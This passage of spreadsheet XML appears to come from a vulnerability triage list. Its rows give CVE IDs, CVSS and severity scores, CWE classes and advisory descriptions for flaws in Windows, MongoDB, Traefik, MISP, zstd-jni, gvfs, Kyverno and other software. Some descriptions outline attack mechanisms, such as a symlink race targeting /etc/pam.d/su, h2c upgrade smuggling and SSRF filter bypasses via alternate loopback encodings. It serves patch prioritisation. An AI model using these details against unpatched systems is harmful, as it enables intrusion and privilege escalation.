          <t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M3513" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81389</t>
        </is>
      </c>
    </row>
    <row r="3514">
      <c r="A3514" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3514" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82062</t>
        </is>
      </c>
      <c r="C3514" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3514" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3514" s="5" t="inlineStr"/>
      <c r="F3514" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3514" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H3514" s="5" t="inlineStr"/>
      <c r="I3514" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3514" s="5" t="inlineStr"/>
      <c r="K3514" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L3514" s="5" t="inlineStr">
        <is>
          <t>A security issue in MongoDB Server allows an authenticated user with elevated internal privileges to bypass a disabled feature gate in the applyOps command by specifying an internal replication mode value that was not intended to be client-selectable. This bypass enables execution of container operations that are disabled by default in production configurations, allowing direct storage-engine writes to arbitrary internal storage tables. The authorization check for these operations validates only the operation's namespace, not the actual storage target, enabling writes to unrelated internal metadata or other collections' data.</t>
        </is>
      </c>
      <c r="M3514" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82062</t>
        </is>
      </c>
    </row>
    <row r="3515">
      <c r="A3515" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3515" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82079</t>
        </is>
      </c>
      <c r="C3515" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3515" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3515" s="5" t="inlineStr"/>
      <c r="F3515" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3515" s="5" t="inlineStr"/>
      <c r="H3515" s="5" t="inlineStr"/>
      <c r="I3515" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3515" s="5" t="inlineStr"/>
      <c r="K3515" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L3515" s="5" t="inlineStr">
        <is>
          <t>A stack-based buffer overflow vulnerability in the Nintendo Switch local wireless networking functionality may allow an attacker within wireless range to execute arbitrary code using return-oriented programming (ROP) through crafted network traffic.
This issue affects Nintendo Switch: before 23.0.0.</t>
        </is>
      </c>
      <c r="M3515" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82079</t>
        </is>
      </c>
    </row>
    <row r="3516">
      <c r="A3516" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3516" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83940</t>
        </is>
      </c>
      <c r="C3516" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3516" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3516" s="5" t="inlineStr"/>
      <c r="F3516" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3516" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H351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516" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3516" s="5" t="inlineStr"/>
      <c r="K3516" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3516" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3516" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83940</t>
        </is>
      </c>
    </row>
    <row r="3517">
      <c r="A3517" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3517" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83999</t>
        </is>
      </c>
      <c r="C3517" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3517" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3517" s="5" t="inlineStr"/>
      <c r="F3517" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3517" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H3517" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="I3517" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3517" s="5" t="inlineStr"/>
      <c r="K3517" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="L3517" s="5" t="inlineStr">
        <is>
          <t>Improper link resolution before file access ('link following') in Windows Resilient File System (ReFS) Deduplication Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3517" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83999</t>
        </is>
      </c>
    </row>
    <row r="3518">
      <c r="A3518" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3518" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85360</t>
        </is>
      </c>
      <c r="C3518" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3518" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3518" s="5" t="inlineStr"/>
      <c r="F3518" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3518" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H351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518" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3518" s="5" t="inlineStr"/>
      <c r="K3518" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3518" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Kernel allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3518" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85360</t>
        </is>
      </c>
    </row>
    <row r="3519">
      <c r="A3519" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3519" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85594</t>
        </is>
      </c>
      <c r="C3519" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3519" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3519" s="5" t="inlineStr"/>
      <c r="F3519" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3519" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="H3519" s="5" t="inlineStr"/>
      <c r="I3519" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3519" s="5" t="inlineStr"/>
      <c r="K3519" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L3519" s="5" t="inlineStr">
        <is>
          <t>Traefik versions from v3.7.1 fail to enforce crossProviderNamespaces restrictions on the traefik.ingress.kubernetes.io/service.middlewares Service annotation in the Kubernetes Ingress provider. A namespace-limited tenant excluded from the allowlist can attach an operator-owned middleware to its Service, and if that middleware injects backend credentials, recover them at a controlled backend.</t>
        </is>
      </c>
      <c r="M3519" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85594</t>
        </is>
      </c>
    </row>
    <row r="3520">
      <c r="A3520" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3520" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86135</t>
        </is>
      </c>
      <c r="C3520" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3520" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3520" s="5" t="inlineStr"/>
      <c r="F3520" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3520" s="5" t="inlineStr"/>
      <c r="H3520" s="5" t="inlineStr"/>
      <c r="I3520" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3520" s="5" t="inlineStr"/>
      <c r="K3520" s="5" t="inlineStr">
        <is>
          <t>CWE-352, CWE-400</t>
        </is>
      </c>
      <c r="L3520" s="5" t="inlineStr">
        <is>
          <t>A Cross-Site Request Forgery (CSRF) vulnerability in WatchGuard Dimension's database snapshot creation feature allows a remote attacker to trigger unauthorized snapshot creation by tricking an authenticated administrator into visiting a specially crafted web page.</t>
        </is>
      </c>
      <c r="M3520" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86135</t>
        </is>
      </c>
    </row>
    <row r="3521">
      <c r="A3521" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3521" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86419</t>
        </is>
      </c>
      <c r="C3521" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3521" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3521" s="5" t="inlineStr"/>
      <c r="F3521" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3521" s="5" t="inlineStr"/>
      <c r="H3521" s="5" t="inlineStr">
        <is>
          <t>misp-project:misp</t>
        </is>
      </c>
      <c r="I3521" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J3521" s="5" t="inlineStr"/>
      <c r="K3521" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-918</t>
        </is>
      </c>
      <c r="L3521" s="5" t="inlineStr">
        <is>
          <t>Affected versions of MISP contain insufficient validation of server-side outbound HTTP destinations in feed retrieval and TAXII discovery functionality.
In feed processing, redirects were followed without validating the redirect scheme or destination. The original request headers were reused across redirect hops, meaning authentication headers or API credentials configured for a feed could be forwarded to a different host. Redirects could also target internal network resources, resulting in SSRF. The fix adds redirect validation, blocks internal destinations for cross-host redirects, strips configured feed credentials before following redirects to another host, and pins validated DNS results to prevent re-resolution after validation.
The TAXII discovery endpoint had a related incomplete SSRF defense. It used gethostbyname() and compared the result against only a few literal addresses. This missed cases including IPv6 loopback (::1), numeric host encodings such as 0x7f000001, and potentially multiple DNS records. The fix moves TAXII discovery to the shared URL egress validator.
Together, these commits harden MISP's outbound URL handling against alternate-address representations, DNS-related bypasses, unsafe redirects, internal-host access, and cross-host credential forwarding.
Version affected: ≤2.5.45</t>
        </is>
      </c>
      <c r="M3521" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86419</t>
        </is>
      </c>
    </row>
    <row r="3522">
      <c r="A3522" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3522" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86749</t>
        </is>
      </c>
      <c r="C3522" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3522" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3522" s="5" t="inlineStr"/>
      <c r="F3522" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3522" s="5" t="inlineStr"/>
      <c r="H3522" s="5" t="inlineStr"/>
      <c r="I3522" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3522" s="5" t="inlineStr"/>
      <c r="K3522" s="5" t="inlineStr">
        <is>
          <t>CWE-252</t>
        </is>
      </c>
      <c r="L3522" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT versions &lt;= 8.6.3 (fixed in 8.7.0) do not check the return value of storage write operations in ImageUploadRequest::handleImages(). Because Laravel's default disk mode does not throw on failure, a silently failed Storage::disk('public')-&gt;put(...) call still caused the application to delete the previous image via deleteExistingImage() and to reassign and persist the model's image reference to the new filename, destroying the existing image and leaving the database row pointing at a file that was never written. A mirror problem existed in deleteExistingImage(), where a failed Storage::delete() still nulled the model's image field, orphaning the file on disk. The condition is not directly attacker-controlled: it is triggered when any legitimate authenticated user submits an image upload while the storage backend transiently fails (for example an S3 network error, a local filesystem permission problem, or quota exhaustion). The result is unrecoverable loss of the prior image and a durable inconsistency between the database and disk that requires manual reconciliation. All models whose controllers route through ImageUploadRequest::handleImages (assets, asset models, users, companies, manufacturers, locations, categories, suppliers, departments, and other image-carrying models) are affected.</t>
        </is>
      </c>
      <c r="M3522" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86749</t>
        </is>
      </c>
    </row>
    <row r="3523">
      <c r="A3523" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3523" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87088</t>
        </is>
      </c>
      <c r="C3523" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3523" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3523" s="5" t="inlineStr"/>
      <c r="F3523" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3523" s="5" t="inlineStr"/>
      <c r="H3523" s="5" t="inlineStr"/>
      <c r="I3523" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3523" s="5" t="inlineStr"/>
      <c r="K3523" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L3523" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed an unauthorized code execution vulnerability in Enforce.</t>
        </is>
      </c>
      <c r="M3523" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87088</t>
        </is>
      </c>
    </row>
    <row r="3524">
      <c r="A3524" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3524" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87825</t>
        </is>
      </c>
      <c r="C3524" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3524" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3524" s="5" t="inlineStr"/>
      <c r="F3524" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3524" s="5" t="inlineStr"/>
      <c r="H3524" s="5" t="inlineStr"/>
      <c r="I3524" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3524" s="5" t="inlineStr"/>
      <c r="K3524" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3524" s="5" t="inlineStr">
        <is>
          <t>zstd-jni before 1.5.7-14 contains a use-after-free vulnerability where streams and contexts hold a dictionary's shared lock only during the load call, allowing the dictionary to be closed while still referenced. Attackers can close a dictionary after associating it with a stream or context, causing subsequent read or write operations to access freed native memory, resulting in silent data corruption or JVM crashes.</t>
        </is>
      </c>
      <c r="M3524" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87825</t>
        </is>
      </c>
    </row>
    <row r="3525">
      <c r="A3525" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3525" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87877</t>
        </is>
      </c>
      <c r="C3525" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3525" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3525" s="5" t="inlineStr"/>
      <c r="F3525" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3525" s="5" t="inlineStr"/>
      <c r="H3525" s="5" t="inlineStr"/>
      <c r="I3525" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3525" s="5" t="inlineStr"/>
      <c r="K3525" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3525" s="5" t="inlineStr">
        <is>
          <t>zstd-jni versions before 1.5.7-14 fail to validate closed state in setDict, setLongMax, setLevel and setRefMultipleDDicts methods of stream classes. Attackers can call these methods on closed streams to write through freed native pointers, corrupting unrelated objects or crashing the JVM.</t>
        </is>
      </c>
      <c r="M3525" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87877</t>
        </is>
      </c>
    </row>
    <row r="3526">
      <c r="A3526" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3526" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88004</t>
        </is>
      </c>
      <c r="C3526" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3526" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3526" s="5" t="inlineStr"/>
      <c r="F3526" s="5" t="inlineStr"/>
      <c r="G3526" s="5" t="inlineStr"/>
      <c r="H3526" s="5" t="inlineStr"/>
      <c r="I3526" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3526" s="5" t="inlineStr"/>
      <c r="K3526" s="5" t="inlineStr">
        <is>
          <t>CWE-436, CWE-807</t>
        </is>
      </c>
      <c r="L3526" s="5" t="inlineStr">
        <is>
          <t>Traefik is an open source HTTP reverse proxy and load balancer. From 3.2.0 until 3.7.13, Traefik entrypoint defenses aliasHeadersStrategy, underscoreHeadersStrategy, and forwardedHeaders inspect req.Header but not req.Trailer, allowing an unauthenticated client to submit an aliasing or trusted header name in an HTTP/1.1 chunked trailer or an HTTP/2 trailer. When the retry or buffering middleware reads the body before the reverse proxy clones the request, the attacker-controlled trailer value reaches a backend that merges trailers into the header namespace, bypassing the documented delete or reject behavior and potentially spoofing identity or forwarded routing data. This issue is fixed in 3.7.13.</t>
        </is>
      </c>
      <c r="M3526" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88004</t>
        </is>
      </c>
    </row>
    <row r="3527">
      <c r="A3527" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3527" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88008</t>
        </is>
      </c>
      <c r="C3527" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3527" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3527" s="5" t="inlineStr"/>
      <c r="F3527" s="5" t="inlineStr"/>
      <c r="G3527" s="5" t="inlineStr"/>
      <c r="H3527" s="5" t="inlineStr"/>
      <c r="I3527" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3527" s="5" t="inlineStr"/>
      <c r="K3527" s="5" t="inlineStr">
        <is>
          <t>CWE-444, CWE-863</t>
        </is>
      </c>
      <c r="L3527" s="5" t="inlineStr">
        <is>
          <t>Traefik is an open source HTTP reverse proxy and load balancer. From 2.11.26 until 2.11.57 and 3.7.13, Traefik forwards a client-supplied Connection header requesting Upgrade, the Upgrade: h2c token, and HTTP2-Settings to a shared backend. If the backend accepts h2c and returns 101 Switching Protocols, Traefik enters a raw tunnel and no longer applies routers, BasicAuth, ForwardAuth, IPAllowList, RateLimit, access logging, metrics, or tracing to later HTTP/2 requests, allowing an unauthenticated request through an unprotected route to reach protected paths on the same backend. This issue is fixed in 2.11.57 and 3.7.13.</t>
        </is>
      </c>
      <c r="M3527" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88008</t>
        </is>
      </c>
    </row>
    <row r="3528">
      <c r="A3528" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3528" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88924</t>
        </is>
      </c>
      <c r="C3528" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3528" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3528" s="5" t="inlineStr"/>
      <c r="F3528" s="5" t="inlineStr"/>
      <c r="G3528" s="5" t="inlineStr"/>
      <c r="H3528" s="5" t="inlineStr"/>
      <c r="I3528" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3528" s="5" t="inlineStr"/>
      <c r="K3528" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="L3528" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the admin backend of gvfs. The privileged gvfsd-admin daemon changes the ownership of newly created private D-Bus sockets by calling the link-following chown() function on a pathname inside a user-controlled directory. A local attacker can exploit this via a Time-of-Check Time-of-Use (TOCTOU) race condition and exchange the socket pathname with a symbolic link pointing to an arbitrary root-owned file (such as /etc/pam.d/su). The daemon subsequently follows the symlink and changes the ownership of the targeted root-owned file to the attacker's user ID. This allows an authenticated local attacker to modify critical system files, leading to a full local privilege escalation to root.</t>
        </is>
      </c>
      <c r="M3528" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88924</t>
        </is>
      </c>
    </row>
    <row r="3529">
      <c r="A3529" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3529" s="5" t="inlineStr">
        <is>
          <t>CVE-2022-51008</t>
        </is>
      </c>
      <c r="C3529" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3529" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3529" s="5" t="inlineStr"/>
      <c r="F3529" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3529" s="5" t="inlineStr"/>
      <c r="H3529" s="5" t="inlineStr"/>
      <c r="I3529" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J3529" s="5" t="inlineStr"/>
      <c r="K3529" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L3529" s="5" t="inlineStr">
        <is>
          <t>PocketMine-MP before 4.12.3 fails to limit unauthenticated sessions, allowing attackers to exhaust player slots by creating sessions without sending LoginPacket. Attackers can flood the server with unauthenticated connections that occupy max-player slots, preventing legitimate players from joining.</t>
        </is>
      </c>
      <c r="M3529" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2022-51008</t>
        </is>
      </c>
    </row>
    <row r="3530">
      <c r="A3530" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3530" s="5" t="inlineStr">
        <is>
          <t>CVE-2024-58379</t>
        </is>
      </c>
      <c r="C3530" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3530" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3530" s="5" t="inlineStr"/>
      <c r="F3530" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3530" s="5" t="inlineStr"/>
      <c r="H3530" s="5" t="inlineStr"/>
      <c r="I3530" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J3530" s="5" t="inlineStr"/>
      <c r="K3530" s="5" t="inlineStr">
        <is>
          <t>CWE-1333</t>
        </is>
      </c>
      <c r="L3530" s="5" t="inlineStr">
        <is>
          <t>nodemailer before 6.9.9 contains a regular expression denial of service vulnerability in email parsing when attachDataUrls parameter is set or processing embedded file attachments. Attackers can send specially crafted emails with malicious data URLs or embedded attachments to cause the event loop to hang and deny service.</t>
        </is>
      </c>
      <c r="M3530" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2024-58379</t>
        </is>
      </c>
    </row>
    <row r="3531">
      <c r="A3531" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3531" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-13465</t>
        </is>
      </c>
      <c r="C3531" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3531" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3531" s="5" t="inlineStr"/>
      <c r="F3531" s="5" t="n">
        <v>0.016</v>
      </c>
      <c r="G3531" s="5" t="inlineStr"/>
      <c r="H3531" s="5" t="inlineStr">
        <is>
          <t>lodash:lodash</t>
        </is>
      </c>
      <c r="I3531" s="5" t="inlineStr">
        <is>
          <t>2026-01-21</t>
        </is>
      </c>
      <c r="J3531" s="5" t="inlineStr"/>
      <c r="K3531" s="5" t="inlineStr">
        <is>
          <t>CWE-1321</t>
        </is>
      </c>
      <c r="L3531" s="5" t="inlineStr">
        <is>
          <t>Lodash versions 4.0.0 through 4.17.22 are vulnerable to prototype pollution in the _.unset and _.omit functions. An attacker can pass crafted paths which cause Lodash to delete methods from global prototypes.
The issue permits deletion of properties but does not allow overwriting their original behavior.
This issue is patched on 4.17.23</t>
        </is>
      </c>
      <c r="M3531" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-13465</t>
        </is>
      </c>
    </row>
    <row r="3532">
      <c r="A3532" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3532" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-15613</t>
        </is>
      </c>
      <c r="C3532" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3532" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3532" s="5" t="inlineStr"/>
      <c r="F3532" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3532" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="H3532" s="5" t="inlineStr"/>
      <c r="I3532" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J3532" s="5" t="inlineStr"/>
      <c r="K3532" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L3532" s="5" t="inlineStr">
        <is>
          <t>Kyverno before v1.13.4 is vulnerable to server-side request forgery (SSRF) via its Service Call functionality. An attacker with permission to create Kyverno (Cluster)Policies can specify an external URL in a policy's apiCall/service configuration; although Service Call is documented for in-cluster services, it also resolves external addresses, allowing requests to an attacker-controlled server. Because policy context data (including contents of Kubernetes resources such as secrets) is sent in these requests, an attacker can exfiltrate sensitive cluster data.</t>
        </is>
      </c>
      <c r="M3532" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-15613</t>
        </is>
      </c>
    </row>
    <row r="3533">
      <c r="A3533" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3533" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-71418</t>
        </is>
      </c>
      <c r="C3533" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3533" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3533" s="5" t="inlineStr"/>
      <c r="F3533" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3533" s="5" t="inlineStr"/>
      <c r="H3533" s="5" t="inlineStr"/>
      <c r="I3533" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3533" s="5" t="inlineStr"/>
      <c r="K3533" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L3533" s="5" t="inlineStr">
        <is>
          <t>PocketMine-MP versions before 5.25.2 fail to limit the explode() function in packet parsing, allowing malicious clients to waste server resources. Attackers can send crafted packets with excessive delimiters to consume CPU and memory through sign editing, JWT parsing, and command parsing endpoints.</t>
        </is>
      </c>
      <c r="M3533" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-71418</t>
        </is>
      </c>
    </row>
    <row r="3534">
      <c r="A3534" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3534" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-1199</t>
        </is>
      </c>
      <c r="C3534" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3534" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3534" s="5" t="inlineStr"/>
      <c r="F3534" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3534" s="5" t="inlineStr"/>
      <c r="H3534" s="5" t="inlineStr">
        <is>
          <t>zabbix:zabbix</t>
        </is>
      </c>
      <c r="I3534" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J3534" s="5" t="inlineStr"/>
      <c r="K3534" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="L3534" s="5" t="inlineStr">
        <is>
